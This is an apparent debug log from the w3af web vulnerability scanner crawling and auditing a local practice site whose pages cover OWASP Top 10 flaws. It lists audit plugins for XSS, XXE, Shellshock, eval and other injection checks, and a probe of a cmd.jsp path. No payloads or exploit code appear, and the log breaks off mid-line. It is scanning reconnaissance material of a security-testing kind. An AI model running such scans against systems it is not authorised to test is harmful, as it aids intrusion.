[Wed Feb 12 09:36:49 2020 - debug] [web_spider] Found new link "http://localhost:9090/learn/vulnerability/a8_ides" at "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] "http://localhost:9090/learn/vulnerability/a6_sec_misconf" (id:660, code:200, len:7894, did:x4kN16FS) is NOT a 404 [known 404 with ID 672 uses 404 code] [Wed Feb 12 09:36:49 2020 - debug] [web_spider] Found new link "http://localhost:9090/learn/vulnerability/a6_sec_misconf" at "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] GET http://localhost:9090/wp-login.php returned HTTP code "404" (id=676,from_cache=1,grep=1,rtt=0.18,did=EHfB6vGq) [Wed Feb 12 09:36:49 2020 - debug] wordpress_enumerate_users.discover(did="oVtR6jzI",uri="http://localhost:9090/learn") took 0.63s to run [Wed Feb 12 09:36:49 2020 - debug] file_upload.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:49 2020 - debug] wsdl_greper.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:49 2020 - debug] cross_domain_js.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:49 2020 - debug] shell_shock.audit(did="9t6TKqxp", uri="http://localhost:9090/") [Wed Feb 12 09:36:49 2020 - debug] shell_shock.audit(did="9t6TKqxp",uri="http://localhost:9090/") took 0.07s to run [Wed Feb 12 09:36:49 2020 - debug] web_diff.discover(http://localhost:9090/learn, did=ZsheXhMa) [Wed Feb 12 09:36:49 2020 - debug] [web_diff] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] The crawl plugin: "web_diff" wont be run anymore. [Wed Feb 12 09:36:49 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:49 2020 - debug] Calling web_diff.end() [Wed Feb 12 09:36:49 2020 - debug] Spent 0.00 seconds running web_diff.end() [Wed Feb 12 09:36:49 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:49 2020 - debug] web_diff.discover(did="ZsheXhMa",uri="http://localhost:9090/learn") took 0.05s to run [Wed Feb 12 09:36:49 2020 - debug] dwsync_xml.discover(http://localhost:9090/learn, did=4scT6djx) [Wed Feb 12 09:36:49 2020 - debug] "http://localhost:9090/learn/vulnerability/a10_logging" (id:662, code:200, len:7708, did:Ld2pW7G8) is NOT a 404 [known 404 with ID 672 uses 404 code] [Wed Feb 12 09:36:49 2020 - debug] [web_spider] Found new link "http://localhost:9090/learn/vulnerability/a10_logging" at "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] Worker with ID CrawlInfraWorker(ZoPbaL8U) has been running job 155 for 28.17 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:36:49 2020 - debug] Worker with ID CrawlInfraWorker(SVfxFVXP) has been running job 54 for 32.19 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:36:49 2020 - debug] Worker with ID CrawlInfraWorker(N5yqeDHB) has been running job 247 for 16.59 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:36:49 2020 - debug] Worker with ID CrawlInfraWorker(1i39mCZz) has been running job 127 for 31.20 seconds. The job is: _discover_worker(, , kwargs={}) [Wed Feb 12 09:36:49 2020 - debug] 0% of CrawlInfraWorker workers are idle. [Wed Feb 12 09:36:49 2020 - debug] CrawlInfraWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:36:49 2020 - debug] CrawlInfraWorker worker pool has 87 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 09:36:49 2020 - debug] memcachei.audit(did="Oqka5UlV", uri="http://localhost:9090/") [Wed Feb 12 09:36:49 2020 - debug] "http://localhost:9090/learn/vulnerability/a7_xss" (id:666, code:200, len:8405, did:LsySxjqV) is NOT a 404 [known 404 with ID 672 uses 404 code] [Wed Feb 12 09:36:49 2020 - debug] [web_spider] Found new link "http://localhost:9090/learn/vulnerability/a7_xss" at "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] websocket_hijacking.audit(did="AeSLAQDy",uri="http://localhost:9090/") took 0.18s to run [Wed Feb 12 09:36:49 2020 - debug] "http://localhost:9090/learn/vulnerability/a9_vuln_component" (id:651, code:200, len:7680, did:h29ArWWf) is NOT a 404 [known 404 with ID 672 uses 404 code] [Wed Feb 12 09:36:49 2020 - debug] [web_spider] Found new link "http://localhost:9090/learn/vulnerability/a9_vuln_component" at "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] "http://localhost:9090/learn/vulnerability/ax_redirect" (id:655, code:200, len:8006, did:BVoRaRJQ) is NOT a 404 [known 404 with ID 672 uses 404 code] [Wed Feb 12 09:36:49 2020 - debug] [web_spider] Found new link "http://localhost:9090/learn/vulnerability/ax_redirect" at "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] "http://localhost:9090/learn/vulnerability/a4_xxe" (id:663, code:200, len:7753, did:YebHoXmn) is NOT a 404 [known 404 with ID 672 uses 404 code] [Wed Feb 12 09:36:49 2020 - debug] [web_spider] Found new link "http://localhost:9090/learn/vulnerability/a4_xxe" at "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] "http://localhost:9090/learn/vulnerability/a2_broken_auth" (id:654, code:200, len:8073, did:8jRSCZB8) is NOT a 404 [known 404 with ID 672 uses 404 code] [Wed Feb 12 09:36:49 2020 - debug] [web_spider] Found new link "http://localhost:9090/learn/vulnerability/a2_broken_auth" at "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] "http://localhost:9090/learn/vulnerability/a3_sensitive_data" (id:658, code:200, len:7596, did:DyXZ1s5f) is NOT a 404 [known 404 with ID 672 uses 404 code] [Wed Feb 12 09:36:49 2020 - debug] [web_spider] Found new link "http://localhost:9090/learn/vulnerability/a3_sensitive_data" at "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] un_ssl.audit(did="MdsoJB4Q", uri="http://localhost:9090/") [Wed Feb 12 09:36:49 2020 - debug] un_ssl.audit(did="MdsoJB4Q",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:49 2020 - debug] ldapi.audit(did="5uFSWhBr", uri="http://localhost:9090/") [Wed Feb 12 09:36:49 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:49 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:5uFSWhBr) [Wed Feb 12 09:36:49 2020 - debug] ldapi.audit(did="5uFSWhBr",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:49 2020 - debug] [dwsync_xml] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:49 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:Oqka5UlV) [Wed Feb 12 09:36:49 2020 - debug] memcachei.audit(did="Oqka5UlV",uri="http://localhost:9090/") took 0.03s to run [Wed Feb 12 09:36:49 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/assets/showdown.min.js" [Wed Feb 12 09:36:49 2020 - debug] buffer_overflow.audit(did="4UcNDTIS", uri="http://localhost:9090/") [Wed Feb 12 09:36:49 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:49 2020 - debug] buffer_overflow.audit(did="4UcNDTIS",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:49 2020 - debug] dwsync_xml.discover(did="4scT6djx",uri="http://localhost:9090/learn") took 0.03s to run [Wed Feb 12 09:36:49 2020 - debug] pykto.discover(http://localhost:9090/learn, did=VJ73KdNn) [Wed Feb 12 09:36:49 2020 - debug] [pykto] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/assets/showdown.min.js" [Wed Feb 12 09:36:49 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/assets/showdown.min.js" [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(eMhX1dy3) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(3HgRKqCq) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(RS6zy0nZ) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(whAWjF5Q) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(p3bZx5th) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(mwQseZLi) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(u4CMgyf5) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(lqDVDrY6) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(YRnW4V5x) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(9LzJerur) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(Yp99VOAc) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(73gUt3um) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(aMdmLsMM) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(bFvnueBw) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(V38wAU0X) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(vNYdoIKY) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(utuu6VyV) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(qKs3BqVS) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(sa3y32hF) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(96tThiDl) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(HSlHQom7) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(j9e6gcyy) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(7QcPqyOP) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(xqAjnjWF) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(VTA88WOg) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(ZBIlH6v6) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(zGkah99j) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(kzsDlYwX) is idle. [Wed Feb 12 09:36:49 2020 - debug] Worker with ID WorkerThread(hGEbXfwZ) is idle. [Wed Feb 12 09:36:49 2020 - debug] 93% of WorkerThread workers are idle. [Wed Feb 12 09:36:49 2020 - debug] Worker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:36:49 2020 - debug] Worker worker pool has 0 tasks in inqueue and 0 tasks in outqueue [Wed Feb 12 09:36:49 2020 - debug] redos.audit(did="3JZzf27w", uri="http://localhost:9090/") [Wed Feb 12 09:36:49 2020 - debug] pykto.discover(did="VJ73KdNn",uri="http://localhost:9090/learn") took 0.14s to run [Wed Feb 12 09:36:49 2020 - debug] "http://localhost:9090/learn/vulnerability/a5_broken_access_control" (id:667, code:200, len:7638, did:Frjg2cpp) is NOT a 404 [known 404 with ID 672 uses 404 code] [Wed Feb 12 09:36:49 2020 - debug] [web_spider] Found new link "http://localhost:9090/learn/vulnerability/a5_broken_access_control" at "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] web_spider.discover(did="AnpPqF7F",uri="http://localhost:9090/learn") took 3.13s to run [Wed Feb 12 09:36:49 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" [Wed Feb 12 09:36:49 2020 - debug] http_in_body.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.36s to run [Wed Feb 12 09:36:49 2020 - debug] global_redirect.audit(did="k6XzK66x", uri="http://localhost:9090/") [Wed Feb 12 09:36:49 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:49 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:k6XzK66x) [Wed Feb 12 09:36:49 2020 - debug] wordpress_fullpathdisclosure.discover(http://localhost:9090/learn, did=zIn3MQ02) [Wed Feb 12 09:36:49 2020 - debug] [wordpress_fullpathdisclosure] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] expect_ct.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:49 2020 - debug] svn_users.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:49 2020 - debug] xss_protection_header.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:49 2020 - debug] private_ip.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:49 2020 - debug] motw.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:49 2020 - debug] meta_generator.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:49 2020 - debug] xpath.audit(did="qSP55Kgj", uri="http://localhost:9090/") [Wed Feb 12 09:36:49 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:49 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:qSP55Kgj) [Wed Feb 12 09:36:49 2020 - debug] phishtank.discover(http://localhost:9090/learn, did=wY45gyJ3) [Wed Feb 12 09:36:49 2020 - debug] [phishtank] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:49 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:49 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:49 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:k6XzK66x) [Wed Feb 12 09:36:49 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/learn/vulnerability/a1_injection" [Wed Feb 12 09:36:49 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/learn/vulnerability/a1_injection" [Wed Feb 12 09:36:49 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" [Wed Feb 12 09:36:49 2020 - debug] GET http://www.bing.com/search?q=@localhost.&FORM=PERE&first=141 returned HTTP code "200" (id=677,from_cache=0,grep=0,rtt=0.40,did=as5IyxuJ) [Wed Feb 12 09:36:49 2020 - debug] xpath.audit(did="qSP55Kgj",uri="http://localhost:9090/") took 0.04s to run [Wed Feb 12 09:36:49 2020 - debug] Using a supported retirejs version [Wed Feb 12 09:36:49 2020 - debug] cors_origin.audit(did="xjWOnc8B", uri="http://localhost:9090/") [Wed Feb 12 09:36:49 2020 - debug] GET http://localhost:9090/api/1.0/swagger.json returned HTTP code "404" (id=601,from_cache=0,grep=1,rtt=0.19,did=c0UiZ8h7) [Wed Feb 12 09:36:49 2020 - debug] The crawl plugin: "phishtank" wont be run anymore. [Wed Feb 12 09:36:49 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:49 2020 - debug] Calling phishtank.end() [Wed Feb 12 09:36:49 2020 - debug] Spent 0.00 seconds running phishtank.end() [Wed Feb 12 09:36:49 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:49 2020 - debug] global_redirect.audit(did="k6XzK66x",uri="http://localhost:9090/") took 0.08s to run [Wed Feb 12 09:36:49 2020 - debug] redos.audit(did="3JZzf27w",uri="http://localhost:9090/") took 0.26s to run [Wed Feb 12 09:36:49 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/assets/fa/css/font-awesome.min.css" [Wed Feb 12 09:36:49 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/assets/fa/css/font-awesome.min.css" [Wed Feb 12 09:36:50 2020 - debug] htaccess_methods.audit(did="Swy1l0PR", uri="http://localhost:9090/") [Wed Feb 12 09:36:50 2020 - debug] phishtank.discover(did="wY45gyJ3",uri="http://localhost:9090/learn") took 0.13s to run [Wed Feb 12 09:36:50 2020 - debug] digit_sum.discover(http://localhost:9090/learn, did=BxlEKrE6) [Wed Feb 12 09:36:50 2020 - debug] [digit_sum] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:50 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" [Wed Feb 12 09:36:50 2020 - debug] get_emails.grep(uri="http://localhost:9090/gears_config") took 0.92s to run [Wed Feb 12 09:36:50 2020 - debug] code_disclosure.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] dav.audit(did="L72raXXO", uri="http://localhost:9090/") [Wed Feb 12 09:36:50 2020 - debug] find_captchas.discover(did="4HoQUTsr",uri="http://localhost:9090/learn") took 3.43s to run [Wed Feb 12 09:36:50 2020 - debug] htaccess_methods.audit(did="Swy1l0PR",uri="http://localhost:9090/") took 0.09s to run [Wed Feb 12 09:36:50 2020 - debug] xxe.audit(did="byvMHnzt", uri="http://localhost:9090/") [Wed Feb 12 09:36:50 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:50 2020 - debug] ssi.audit(did="N63N36kN", uri="http://localhost:9090/") [Wed Feb 12 09:36:50 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=678,from_cache=0,grep=1,rtt=0.05,did=xjWOnc8B) [Wed Feb 12 09:36:50 2020 - debug] open_api.discover(http://localhost:9090/learn, did=QkhjpaUC) [Wed Feb 12 09:36:50 2020 - debug] [open_api] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:50 2020 - debug] GET http://localhost:9090/wp-login.php returned HTTP code "404" (id=679,from_cache=1,grep=1,rtt=0.18,did=nvimOpcW) [Wed Feb 12 09:36:50 2020 - debug] wordpress_fullpathdisclosure.discover(did="zIn3MQ02",uri="http://localhost:9090/learn") took 0.38s to run [Wed Feb 12 09:36:50 2020 - debug] dot_ds_store.discover(http://localhost:9090/learn, did=4eFYxGuO) [Wed Feb 12 09:36:50 2020 - debug] [dot_ds_store] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:50 2020 - debug] dav.audit(did="L72raXXO",uri="http://localhost:9090/") took 0.05s to run [Wed Feb 12 09:36:50 2020 - debug] form_cleartext_password.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.08s to run [Wed Feb 12 09:36:50 2020 - debug] Unknown post-data. Content-type: "None" and/or post-data "" [Wed Feb 12 09:36:50 2020 - debug] serialized_object.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] blank_body.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] path_disclosure.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] strange_http_codes.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] credit_cards.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] websockets_links.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] csp.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] dom_xss.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] vulners_db.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] strict_transport_security.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] keys.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] Worker with ID AuditorWorker(Nl4i0Dmr) is idle. [Wed Feb 12 09:36:50 2020 - debug] Worker with ID AuditorWorker(3lIHqMdP) is idle. [Wed Feb 12 09:36:50 2020 - debug] Worker with ID AuditorWorker(VHimOIct) is idle. [Wed Feb 12 09:36:50 2020 - debug] Worker with ID AuditorWorker(AAwzqj5O) is idle. [Wed Feb 12 09:36:50 2020 - debug] Worker with ID AuditorWorker(OFMDNz5i) is idle. [Wed Feb 12 09:36:50 2020 - debug] Worker with ID AuditorWorker(Rim1zDwH) is idle. [Wed Feb 12 09:36:50 2020 - debug] Worker with ID AuditorWorker(E71iJb08) is idle. [Wed Feb 12 09:36:50 2020 - debug] 70% of AuditorWorker workers are idle. [Wed Feb 12 09:36:50 2020 - debug] AuditorWorker worker pool internal thread state: (worker: True, task: True, result: True) [Wed Feb 12 09:36:50 2020 - debug] AuditorWorker worker pool has 0 tasks in inqueue and 2 tasks in outqueue [Wed Feb 12 09:36:50 2020 - debug] eval.audit(did="T5lp5tZk", uri="http://localhost:9090/") [Wed Feb 12 09:36:50 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:50 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:T5lp5tZk) [Wed Feb 12 09:36:50 2020 - debug] xxe.audit(did="byvMHnzt",uri="http://localhost:9090/") took 0.05s to run [Wed Feb 12 09:36:50 2020 - debug] rosetta_flash.audit(did="wtsyG9G4", uri="http://localhost:9090/") [Wed Feb 12 09:36:50 2020 - debug] rosetta_flash.audit(did="wtsyG9G4",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/learn/vulnerability/a8_ides" [Wed Feb 12 09:36:50 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/learn/vulnerability/a8_ides" [Wed Feb 12 09:36:50 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" [Wed Feb 12 09:36:50 2020 - debug] xss.audit(did="80jdUz7d", uri="http://localhost:9090/") [Wed Feb 12 09:36:50 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:50 2020 - debug] xss.audit(did="80jdUz7d",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] GET http://localhost:9090/learn returned HTTP code "200" (id=680,from_cache=0,grep=1,rtt=0.07,did=HzT1L92x) [Wed Feb 12 09:36:50 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/learn/vulnerability/a6_sec_misconf" [Wed Feb 12 09:36:50 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/learn/vulnerability/a6_sec_misconf" [Wed Feb 12 09:36:50 2020 - debug] form_autocomplete.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.10s to run [Wed Feb 12 09:36:50 2020 - debug] clamav.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] html_comments.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.08s to run [Wed Feb 12 09:36:50 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" [Wed Feb 12 09:36:50 2020 - debug] xst.audit(did="ipDKd6og", uri="http://localhost:9090/") [Wed Feb 12 09:36:50 2020 - debug] xst.audit(did="ipDKd6og",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] GET http://localhost:9090/ returned HTTP code "302" (id=681,from_cache=0,grep=1,rtt=0.03,did=xjWOnc8B) [Wed Feb 12 09:36:50 2020 - debug] cors_origin.audit(did="xjWOnc8B",uri="http://localhost:9090/") took 0.50s to run (0.09s 17% sending HTTP requests) [Wed Feb 12 09:36:50 2020 - debug] digit_sum.discover(did="BxlEKrE6",uri="http://localhost:9090/learn") took 0.38s to run [Wed Feb 12 09:36:50 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:50 2020 - debug] localhost:9090 connection pool stats (free:50 / in_use:0 / max:50 / total:50) [Wed Feb 12 09:36:50 2020 - debug] There are no connections marked as in use in the connection pool at this time [Wed Feb 12 09:36:50 2020 - debug] eval.audit(did="T5lp5tZk",uri="http://localhost:9090/") took 0.19s to run [Wed Feb 12 09:36:50 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:50 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:N63N36kN) [Wed Feb 12 09:36:50 2020 - debug] http_auth_detect.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.04s to run [Wed Feb 12 09:36:50 2020 - debug] ghdb.discover(http://localhost:9090/learn, did=aimnvCGc) [Wed Feb 12 09:36:50 2020 - debug] [ghdb] Crawling "http://localhost:9090/learn" [Wed Feb 12 09:36:50 2020 - debug] The crawl plugin: "ghdb" wont be run anymore. [Wed Feb 12 09:36:50 2020 - debug] Starting CrawlInfra consumer _teardown() with 1 plugins [Wed Feb 12 09:36:50 2020 - debug] Calling ghdb.end() [Wed Feb 12 09:36:50 2020 - debug] Spent 0.00 seconds running ghdb.end() [Wed Feb 12 09:36:50 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:50 2020 - debug] ghdb.discover(did="aimnvCGc",uri="http://localhost:9090/learn") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] ssl_certificate.audit(did="El0T5tLJ", uri="http://localhost:9090/") [Wed Feb 12 09:36:50 2020 - debug] ssl_certificate.audit(did="El0T5tLJ",uri="http://localhost:9090/") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] preg_replace.audit(did="OhvBbZAn", uri="http://localhost:9090/") [Wed Feb 12 09:36:50 2020 - debug] Created 0 mutants for "Method: GET | http://localhost:9090/" () [Wed Feb 12 09:36:50 2020 - debug] send_mutants_in_threads will send 0 HTTP requests (did:OhvBbZAn) [Wed Feb 12 09:36:50 2020 - debug] New fuzzable request identified: "Method: GET | http://localhost:9090/learn/vulnerability/a10_logging" [Wed Feb 12 09:36:50 2020 - information] New URL found by web_spider plugin: "http://localhost:9090/learn/vulnerability/a10_logging" [Wed Feb 12 09:36:50 2020 - debug] strange_parameters.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.02s to run [Wed Feb 12 09:36:50 2020 - debug] VariantDB is returning False because of "seen_exactly_the_same" for "Method: GET | http://localhost:9090/learn/vulnerability/a7_xss" [Wed Feb 12 09:36:50 2020 - debug] dot_ds_store.discover(did="4eFYxGuO",uri="http://localhost:9090/learn") took 0.27s to run [Wed Feb 12 09:36:50 2020 - debug] allowed_methods.discover(http://localhost:9090/cmd.jsp, did=WIbMOF3F) [Wed Feb 12 09:36:50 2020 - debug] The infrastructure plugin: "allowed_methods" wont be run anymore. [Wed Feb 12 09:36:50 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:36:50 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:50 2020 - debug] allowed_methods.discover(did="WIbMOF3F",uri="http://localhost:9090/cmd.jsp") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] frontpage_version.discover(http://localhost:9090/cmd.jsp, did=GrZFUJCr) [Wed Feb 12 09:36:50 2020 - debug] preg_replace.audit(did="OhvBbZAn",uri="http://localhost:9090/") took 0.04s to run [Wed Feb 12 09:36:50 2020 - debug] url_session.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.03s to run [Wed Feb 12 09:36:50 2020 - debug] dot_net_event_validation.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] objects.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] error_500.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:50 2020 - debug] meta_tags.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:51 2020 - debug] password_profiling.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:51 2020 - debug] click_jacking.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:51 2020 - debug] directory_indexing.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:51 2020 - debug] lang.grep(uri="http://localhost:9090/sitemanifest.gears") took 0.00s to run [Wed Feb 12 09:36:51 2020 - debug] ssi.audit(did="N63N36kN",uri="http://localhost:9090/") took 0.35s to run [Wed Feb 12 09:36:51 2020 - debug] The infrastructure plugin: "frontpage_version" wont be run anymore. [Wed Feb 12 09:36:51 2020 - debug] Starting CrawlInfra consumer _teardown() with 0 plugins [Wed Feb 12 09:36:51 2020 - debug] Finished CrawlInfra consumer _teardown() [Wed Feb 12 09:36:51 2020 - debug] frontpage_version.discover(did="GrZFUJCr",uri="http://localhost:9090/cmd.jsp") took 0.08s to run [Wed Feb 12 09:36:51 2020 - debug] server_header.discover(http://localhost:9090/cmd.jsp, did=0Kso9Q5T) [Wed Feb 12 09:36:51 2020 - debug] mx_injection.audit(did="X3XdX1kp", 